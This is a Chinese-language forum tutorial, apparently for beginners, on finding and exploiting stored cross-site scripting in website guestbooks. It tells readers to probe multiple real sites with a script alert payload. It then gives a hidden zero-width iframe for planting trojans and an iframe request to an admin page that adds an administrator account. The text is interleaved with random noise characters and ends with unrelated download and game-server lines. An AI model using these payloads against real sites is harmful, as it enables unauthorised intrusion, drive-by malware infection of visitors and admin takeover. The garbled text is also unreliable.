软件简介:: K2 S1 b Y4 Q
大家好 我是游牧 我们今天继续我们的系列教程 上次和大家讲了用默认数据库来入侵,但是由于现在的网络管理员的安全意识与日俱增 8 ]& M: c, d: g4 ~
所以 这招也并不是屡试不爽 今天给大家提供一个新的思路----跨站(XSS) 当然 为了适合广大菜鸟的知识水平 这节课同样很简单 8 }# h4 ~0 H( Q( [
没有对读代码有任何的要求 我们不懂代码 也能跨站% I' n8 ~0 o ]
1.发现漏洞2 I6 m* W. B: ?# K) T% f
好了 那我们就开始吧 当然 首先还是要找几个网站 最好多找几个 因为这个漏洞不一定每个都有 下面大家看操作吧# O4 x- f4 h* k r
大家点开留言板 在每个能填的地方填入下面的代码 然后查看原代码 查找 scriptalert(/haha/)/script 看到了吗
' ]: m7 W/ \9 S2 D) X# Q好了 现在带领大家来读一读代码 以便进步阿 不能总停留在原地嘛
! E9 t7 w# L# O8 N: U9 E好了 下面我们要来利用这个漏洞: m* X' x/ F* F# q% x: {- p' G
2.利用漏洞
) _& p y# p8 Z e, @1 x: {利用一 挂马
/ Q5 C% e4 I; b w+ N7 `, Y: Ciframe scr=http://www.baidu.com width=0/iframe+ H7 F, t4 |+ u. E% t
利用二 加用户" P F7 T" j/ K8 v6 N
iframe scr=/admin/saveadmin.asp?action=add/iframe% w$ o( \, t' ^+ e: z
QQ:273691522" }' i. p. l* l# B% H" u
下载地址:
|
石器时代10.0预言版服务端+客户端+工具大全
